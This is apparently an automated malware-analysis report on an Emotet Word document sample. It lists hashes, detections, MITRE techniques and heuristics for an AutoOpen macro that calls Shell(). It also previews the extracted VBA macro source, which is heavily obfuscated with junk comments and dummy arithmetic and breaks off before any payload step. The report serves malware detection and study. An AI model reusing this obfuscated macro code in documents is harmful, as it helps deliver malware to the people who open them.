Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 b160f7e0036a12a9…

MALICIOUS

Office (OLE)

Size: 74.5 KB
Created: 2017-09-25 17:30:00
Authoring application: Microsoft Office Word
First seen: 2020-08-25
MD5: 6e6118f6e06d8cff7fdf5ff86417e326
SHA-1: ca90c4c4a0d5869bb82e9c83b91c89a0680dc055
SHA-256: b160f7e0036a12a9b7b499249950aaeec569484ff0d50122c4d32d72c75aaf49
Risk Score: 242

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6344335-3', indicating it is likely part of the Emotet family. Critical heuristics indicate the presence of VBA macros that utilize the Shell() function, a common technique for downloading and executing secondary payloads. The AutoOpen macro further suggests an automated execution flow upon opening the document.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-6344335-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6344335-3
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7493 bytes
SHA-256: f6ba657076b299b7c12dd1e699e8e9c59fb59239449ad4faf1cf33d8f3de3259
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
'kNHNEeyzxDuVgrfnHKAdhnEmRnZZUUTaUASGPESNXvdwrMzRNuHebmAgRXXUx
 'EHWtSxLbFYgeVgVbGVvKMfvyLVzyXUpwGYcXuUWzuXMFAaUZHwKHhyBxwTwUVLU
 'xAcNVrygUetgeEBThLysuwvuCZvcWYEuAVXmkXyAfcMrHZerdcFCNZfz
 'PpsHurtPPgKxRfgDwnarHFScCEvXSucbFWARTmPBfNcCThsBLHGPFyprRmrSmdyxXE
 'wDHZKPchNMXsVRMDyhrazbRSTHhLWchVfuefSdtVseGNHAuPUDXmYxHA
 'CWWXcNXmMCDppRarTRmUErrsyCBTubFZdBazGRGczXMkkLLchEcVNyhEuCypg
 'TvZcpsHcrCtDfcDVfntDHpkYNsduSpedwLeVbWpZrHMaxLmrmzAtvkeVKDnmy
 'tFTtBduhndvHUUGPuSaFuxgrYMeXULCfCvcWrZbnXxcPrevHVpWHrZRBrEnytBKw
 'zMwnKxnzFyVhvahWDHbyyctNACWHBENngUdVvVeGsSBZmbskvAnpDfewpezYnddc
 'xDNAxcftwGPDfFFbFeZykrXbauTeaRzaHbyUFutReytXVPEaFYuEsCWWdn
 'ArHkmBgMsxYzmzkKGCWucBFGaBSWsdyHmXmKUXGDFavfywYKpgYLsstmZGHZLEHfxS
 'UeHcNuEFpdArwMZPDcWWLgkygWYdSFBSgxNrYgyvZCCxbfCCHUMLEEvcyzGr
 'mfVkWkNEGEcyFeYYBKdKRUEktvGPBVaWtDHwvZTFpTpCYxbYCXTePzeTETv
 'wLDgFkktBfrDULTcUZwTCzZLEEwSFHCvGTWfmFtVPLrfvFbxNSSsbcuZrxmwzsAKMLD
 'yNvBSKRKNkGZwvuuBCmgdxATAtUYnNgSSZSACeyYpwBmmprRZnTLehRUhKNzvKkP
 'mSkNAAyebdveCccddefnydWrnGtkUGmBgYTkATaeFbVxKsDMDvVXUHfDmuXddAbp
 'YchFASVRMPKpHBRrfSmcKnVNnvKVgYndpkRtBVpsrkCZsrWAxKNEWcZdnfncmudEk
 'xUrwDSSaXhrDgFgsdYtTbRpGkMZHHkFBmbgwEsumxfyXzAsSYkWTBXMaEDkXnDbY
 'xzcPpNawWBgKVSeREHvMSCCMbwvLtnTNAAZnvmREBtpkYpmPkCeLWzGdSUXd
 'BMcUkMPNmrTdRpKxWCsSvXrVSgGKEkdaxvyHSMBSfCwTCGxvmKZxhKMFbFsgkUF
 'arRzcEvnYkdaCnsXeMKNVBHpFYxXLmtweXRMGuCahhYHRkYfAMaXEaSscXc
 'usmtEDrutTCDYkxePULEygaMSxTPmfPnvTGsdTMVMmNgrryznwfUXGMRutDmyPehw
 'NUvtPpZbLrDVXCxBmCchzeHcnhRxErAFdfhYBAxYmLTbKBDNEUvxVntdu
 'HLccUxHaEDkasGgCySHZRAgPZXEsUktBBvWmxdcKPcrWkPVVVswKHzr
 'FzSHeuHsSXHwydDyXBZfHTPaThZpUVsfEkKuUKZTkeycGPLHMxZrYEvXCStvztcBpr
 'NCXfpvdrxAVEBwdccRfUmKNGkUpePkbdpbxVFsZnXKkupwbxcguchenPBH
 'bVTcnvRvgPHDKYhKWycvUaAhuZRfnBvCWxESkKpPAuNHgMAESVRFnruAdLzAna
 'MSuMmvPGYPtXAZybyypxehGZSweZfnFYvBywAddcwpUkGPUuWvAtxthAcCaUwnX
 'TTXLwTCFLtuSLKhmRrbUHUbgdwrUraMDdWAnyGrKXLMXWnZVSFuXFTMVmRAt
 'AKhLDcYVYvsyUpSMVXxnGcbasMBCHZvbspRDgfduuZeZpdYTHYWCUgyKSwnfBRfakNX

Sub WJsV93059()
   On Error Resume Next
End Sub
 Sub mhHA5531()
   On Error Resume Next
   If ydvb > IzRL531 Then
      EfOV2g = 487784771 - Cos(FoW) + Bszc16x - Log(jHT + CLng(3 / CInt(xWRx3 * CDate(VSDTeA4V) / 71 * 17) + wXXq1O68 * JGF) / CFCfe04 + ChrW(rBRX0QTU2 + CStr(LaXi0vb) + 418145290 / Hex(336657550))) - sEdiytpq + qqyk9K8
      ElseIf RnjLzIZlD <= qXrn2 Then
      ZiQRW6692 = PBeGVW / 207199780
      Uxgq = FsUaP3105 + 246657521
   End If
   For ujEm = 6 To 33
      If WwJGe7L53 <> HRw Then
         Zmhm3 = RywiH
      End If
      boiy05aF = 392 + 244954393 + eyJ / Atn(HLvT) + 381545904 + Hex(343) * LAoU9rQ6 - CStr(tTjt)
   Next
   lSDQb89X = bnxt0 / 39599055
End Sub
 Sub zwty4pc()
   On Error Resume Next
   SIrX487n = Sqr(8394)
   JpXWX1aX8 = 512 / Cos(MoPJF65) + SMEE8da0 - Cos(MDW + 330 / 116 + CDate(amCl5)) + 118 - 232 * fXJHu * Chr(7849 + ChrW(aGytGVe + Tan(GykwS8G))) / 842 - CLng(904) / 129274571 / Atn(192 / pKu) / 37816378 + Log(jVj + Int(780)) * BGWr / 4
End Sub
 Sub MmeXrK(fIdW4)
   On Error Resume Next
   CpQRG11m = 237228831
   KpuFF9 = 335309208 + 429128372
End Sub
 Sub ckTCc(dNo)
   On Error Resume Next
   pZKgB8Daa = ntETD * 77305003
End Sub
 Sub pzea(AOyoH05)
   On Error Resume Next
End Sub

Function EdsceWZsbx()
'LdPFexCascMnLCCfYXBNPbfaYUePSfKabBuUwfCaWTLCdkeYCZCEzvGsNDWaKSYA
 'xwnbntSThNgUeymDUcfPeGerEvcpxNrWhezZbAeBMnKZxbLZcnLWPvKnucLnBm
 'BYuyWUNhcebhVNpAKYCdnDaAgLTufSYMKHBaMpdFVbbGxMGrFWhaLtLCXXYNpLeuHGT
 'kUySYSPsKZnYLbuULsmMgLrBuhrsbHCSSGhvYgRMcteVxuEMEynSnEKVEFYWkrgGsm
 'HBGnHyGAXvNgpEgmhpygUZGdemvyktKBnXsmCDZZsnSCauvbGLNYdNzBcCyRHAyg
 'NVyLszNYgakaKCSWwTPWWXVzavayYbSTuNWWNYeZDttUpDbLfrzncXE
 'feeUdXgZLNaLGKAVMFSGZsGmCVVMXSRkYYApTBsKNmbasfUeaxcXVMruAgFsRavy
 'VUfAcfEgvtWKHTuLkSMuSbYYTFycWLNaRVZye
... (truncated)